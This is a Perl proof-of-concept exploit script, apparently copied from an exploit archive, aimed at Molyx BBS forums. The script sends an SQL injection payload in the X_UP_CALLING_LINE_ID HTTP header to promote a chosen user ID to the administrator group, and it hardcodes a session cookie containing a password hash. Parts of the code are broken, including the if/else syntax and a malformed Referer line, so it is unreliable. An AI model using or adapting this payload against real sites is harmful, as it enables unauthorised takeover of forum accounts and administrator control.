molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
来源:Sebug.net
# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with php5 or php4&&GPC=off
## Example:
## C:\>mlexp.pl 127.0.0.1 /bbs/ 1
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] Expoilted! Maybe Id=1 is Admin Now!!
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " mlexp.pl\n";
print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)\n";
print " Usage: mlexp.pl <server> <folder> <user_id> \n";
print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
$evildata="0',usergroupid=4 where id=$user_id/*";
$script='/wap/associate.php?do=1';
$path =$folder.$script;
$count=$count+1;
$message = "POST ".$folder." HTTP/1.1\r\n";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n";
$message .= "Referer: http://".$server.$folder."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
print $socket "$message";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /操作成功完成/)
print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!\n"
else print "[-] exploit failed\n";
}